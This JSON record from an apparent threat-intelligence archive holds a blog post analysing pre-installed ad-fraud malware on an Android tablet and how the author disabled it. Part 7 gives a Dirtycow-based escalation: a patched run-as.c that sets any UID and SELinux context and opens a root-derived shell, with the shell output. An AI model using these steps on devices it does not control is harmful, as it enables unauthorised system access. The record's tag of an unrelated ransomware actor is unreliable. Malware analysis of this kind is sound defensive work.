{
	"id": "c7fbeceb-7abb-4fdc-88d0-e23fe79f5fb8",
	"created_at": "2026-04-06T00:08:27.523332Z",
	"updated_at": "2026-04-10T03:30:33.938241Z",
	"deleted_at": null,
	"sha1_hash": "fff920cb7e4afb0dfdf90bc6cce38c47992b3f4e",
	"title": "Collin Mulliner - Stuff I do and Things I Like",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 64812,
	"plain_text": "Collin Mulliner - Stuff I do and Things I Like\r\nArchived: 2026-04-05 15:13:23 UTC\r\nIn November I bought a cheap Android Tablet for a wall-mounted display (see this blog post: Android InfoPanel).\r\nAfter a couple of days (or weeks?) suddenly some overlay ads and warnings from Google Play about malicious\r\napps appeared. I didn't have time to investigate so I just tried to close the apps and ads. This got more complicated\r\nsince all of it was in Chinese. I ended up navigating the menu of what looked like a 3rd-party app store to uninstall\r\nan app named Retipuj that was flag by Google Play for ad-fraud. All of this using Google Translate on my phone.\r\nThis solution worked for a couple of days. Returning back from my Holiday trip I was greeted by overlay ads\r\nonce again. Luckily I had some time on my hands to investigate. Here a short write-up.\r\nPart 1, observations and hoping for an easy way out:\r\nI found one app that I didn't install (com.hero.filter), I uninstalled it via adb uninstall com.hero.filter. I tried\r\nGoogling the package name but without success.\r\nRemoving the app didn't seem to do anything. Judging by the task bar there still seem to be a number of\r\napps running but checking via Settings/Apps and on the filesystem (/data/apps) no apps are installed. Every\r\nnow and then a pop-up appears that looks like a 3rd party market trying to download and install apps.\r\nInstallation is blocked by Google Play (verified apps I assume).\r\nPart 2, looking at processes:\r\nI found two interesting looking processes net.atlas.utopia and android.hb.uys.pbuild looking at the\r\nSeLinux context they seem to be platform apps (u:r:platform_app:s0). These could be candidates (spoiler -\r\nthey are). Using pm list packages -f I determined that net.atlas.utopia is install in /system/priv-app/Kyz2203 with the data in /data/data/net.atlas.utopia.\r\npm list packages -f (only showing some interesting packages):\r\npackage:/data/app/com.hero.filter-1/base.apk=com.hero.filter\r\npackage:/system/app/AutoDialer/AutoDialer.apk=com.example\r\npackage:/system/priv-app/Kyz2203/Kyz2203.apk=net.atlas.utopia\r\npackage:/system/priv-app/reanimation/reanimation.apk=android.hb.uys.pbuild\r\nPart 3, a quick peak into net.atlas.utopia:\r\nPermissions: this app has like every permission you can think off including install and delete packages,\r\nsend SMS, read and write any setting and file. Further it has a number of app permissions that correspond\r\nto lenovo, oppo, huawei, and htc devices.\r\nhttps://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html\r\nPage 1 of 5\n\nThe app registers intent filters for a number of events: boot up, time zone change, packages install/remove,\r\noutgoing calls, etc. It basically monitors everything that is going on on the device. Pretty shitty.\r\nThe data directory also contained a dex file with the name whatsappui1.dex. A quick Google search on\r\nwhatsappui1 has one hit on team cymru's hash list: whatsappui1 with not much details but identify the file\r\nas being associated with ad-based malware.\r\nThe most interesting thing I found in this app is the use of a 3rd party library called DroidPlugin.\r\nDroidPlugin is a plugin framework for Android that allows to run any third-party apk without installation,\r\nmodification or repackage. Seems like the perfect tool for malware distribution.\r\nPart 4, a quick peak into android.hb.uys.pbuild:\r\nPermissions are very similar to the net.atlas.utopia including the permissions corresponding to specific\r\ndevice manufacturers.\r\nThe manifest contains traces of ad related things. The library directory contains libiohook.so. The library\r\ncontains symbols from Cydia Substrate. The library name appears in various search results that indicate ad\r\nrelated malware.\r\nThe asset directory contains a certificate ky_dsa_public.crt with no interesting issuer. jar file that contains a\r\ndex file and two .png files that contain ascii/text.\r\nPart 5, getting rid of it all:\r\nHow do we get rid of pre-installed software? The system partition is read-only so we can't uninstall it! The\r\nbest idea, that does not involve rooting and flashing new firmware, is disabling the package using the\r\npackage manager (pm disable net.atlas.utopia) this however requires system privileges. You don't have\r\nsystem privileges without rooting. You can disable apps via Settings but you can only disable them if they\r\nare in the list. The ones we want to disable are not in the list.\r\nHow do we get system? The tablet still runs a 3.10.72 kernel so it might be vulnerable to dirtycow. I\r\nchecked using the tools from timwr and yes it is vulnerable to dirtycow. Using my modified version of run-as as shown in my SafetyNet Talk we can become the system user and disable any package we want by\r\nrunning: pm disable PACKAGE.\r\nHere the list of packages I disabled, so far no APKs are getting installed and I haven't seen any more ads.\r\npm list packages -d\r\npackage:com.mediatek.schpwronoff\r\npackage:android.hb.uys.pbuild\r\npackage:com.mediatek.ygps\r\npackage:com.android.htmlviewer\r\npackage:com.android.browser\r\nhttps://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html\r\nPage 2 of 5\n\npackage:com.hero.filter\r\npackage:com.example\r\npackage:com.svox.pico\r\npackage:com.opera.max.global\r\npackage:com.android.dreams.phototable\r\npackage:net.atlas.utopia\r\npackage:com.mediatek.weather\r\npackage:com.opera.max.loader\r\npackage:com.qihoo.appstore\r\npackage:com.fw.upgrade.sysoper\r\npackage:com.android.vpndialogs\r\nPart 7, Dirtycow trickery:\r\nAs described on my slides you can modify run-as.c from timwr to become any UID with almost any\r\nSELinux context (depending on the device's SeLinux policy!). For our purpose we can become any UID\r\nand context that we require. Below some notes on how this works.\r\nDirtycow lets you overwrite any file that is how you replace /system/bin/run-as with your own binary. The\r\nbinary cannot be bigger then the one you are overwriting. This might be a problem when you have a very\r\nvery small run-as (9k in my case).\r\n1|shell@KT107:/data/local/tmp $ ls -al /system/bin/run-as\r\n-rwsr-s--- root shell 9444 2018-09-27 03:44 run-as\r\nThe workaround I took was not using ndk-build to build run-as.c and instead manually running arm gcc.\r\nThis will reduce the binary size due to discarding complier flags used by the ndk. Another solution would\r\nbe to just load a shared library from run-as to keep the binary size small.\r\nOnce you have my version of run-as you can become (almost) any user.\r\nshell@KT107:/data/local/tmp $ run-as 1000 u:r:platform_app:s0\r\nshell@KT107:/data/local/tmp $ id\r\nuid=1000(system) gid=1000(system) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(s\r\nSystem (UID 1000) allows you to poke around /data/app/* and /data/data. If you want to explore\r\n/data/data/APP you need to assume the UID and context of that app.\r\nshell@KT107:/data/data $ ls -al\r\ndrwxr-x--x u0_a13 u0_a13 u:object_r:app_data_file:s0 net.atlas.utopia\r\nrun-as 10013 u:r:platform_app:s0\r\nshell@KT107:/data/data $ id\r\nuid=10013(u0_a13) gid=10013(u0_a13) groups=1003(graphics),1004(input),1007(log),1011(adb),1015\r\nshell@KT107:/data/data/net.atlas.utopia $ ls -al\r\nhttps://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html\r\nPage 3 of 5\n\ndrwx------ u0_a13 u0_a13 2017-12-31 19:00 Plugin\r\ndrwxrwx--x u0_a13 u0_a13 2017-12-31 19:00 app_dex\r\ndrwxrwx--x u0_a13 u0_a13 2017-12-31 19:00 cache\r\ndrwxrwx--x u0_a13 u0_a13 2017-12-31 19:00 databases\r\ndrwx------ u0_a13 u0_a13 2017-12-31 19:00 fankingbox\r\nlrwxrwxrwx install install 2015-12-31 19:00 lib -\u003e /data/app-lib/net.atlas.utopia\r\ndrwxrwx--x u0_a13 u0_a13 2019-01-03 15:56 shared_prefs\r\n-rw------- u0_a13 u0_a13 9572 2019-01-03 15:54 whatsappui1.dex\r\nBelow is my patch for run-as.c. My version sets the UID from the first argument and the SELinux context\r\nfrom the second argument.\r\n--- run-as-crm.c 2019-01-03 17:54:41.153471054 -0500\r\n+++ run-as.c 2019-01-03 17:58:39.378353437 -0500\r\n@@ -28,6 +28,8 @@\r\n {\r\n LOGV(\"uid %s %d\", argv[0], getuid());\r\n \r\n+ int duid = atoi(argv[1]);\r\n+\r\n if (setresgid(0, 0, 0) || setresuid(0, 0, 0)) {\r\n LOGV(\"setresgid/setresuid failed\");\r\n }\r\n@@ -56,7 +58,7 @@\r\n LOGV(\"dlsym setcon error %s\", error);\r\n } else {\r\n setcon_t * setcon_p = (setcon_t*)setcon;\r\n- ret = (*setcon_p)(\"u:r:shell:s0\");\r\n+ ret = (*setcon_p)(argv[2]);\r\n ret = (*getcon_p)(\u0026secontext);\r\n LOGV(\"context %d %s\", ret, secontext);\r\n }\r\n@@ -66,6 +68,12 @@\r\n LOGV(\"no selinux?\");\r\n }\r\n \r\n+ if (setresgid(duid, duid, duid) || setresuid(duid, duid, duid)) {\r\n+ LOGV(\"setresgid/setresuid failed\");\r\n+ }\r\n+ LOGV(\"uid %d\", getuid());\r\n+\r\n system(\"/system/bin/sh -i\");\r\n \r\n-}\r\n\\ No newline at end of file\r\nhttps://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html\r\nPage 4 of 5\n\n+}\r\n+\r\nConclusions:\r\nOverall I would have preferred to not get pre-installed malware on my Android Tablet as I would rather\r\nhave spent my time on my InfoPanel app or on other projects. However it was impossible for me to ignore\r\nthis issue and simply buy a different tablet. Tracking down the malware still was kinda fun. It was the first\r\ntime I experienced the issue of pre-installed malware first hand. I' also fairly happy that I didn't have to\r\nmodify the firmware since this would have cost way more time. The most interesting thing I found was\r\ndefinitely the DroidPlugin project that allows running APKs without installing them. I wish I had more\r\ntime to reverse engineer all the different apps and how they work together. I uploaded a zip file containing\r\nmost components I talked about in this blog post here: yellyouth.zip.\r\nI hope I finally disabled all of the components and have an ad free device.\r\nSource: https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html\r\nhttps://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html"
	],
	"report_names": [
		"yellyouth_android_malware.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775791833,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fff920cb7e4afb0dfdf90bc6cce38c47992b3f4e.pdf",
		"text": "https://archive.orkl.eu/fff920cb7e4afb0dfdf90bc6cce38c47992b3f4e.txt",
		"img": "https://archive.orkl.eu/fff920cb7e4afb0dfdf90bc6cce38c47992b3f4e.jpg"
	}
}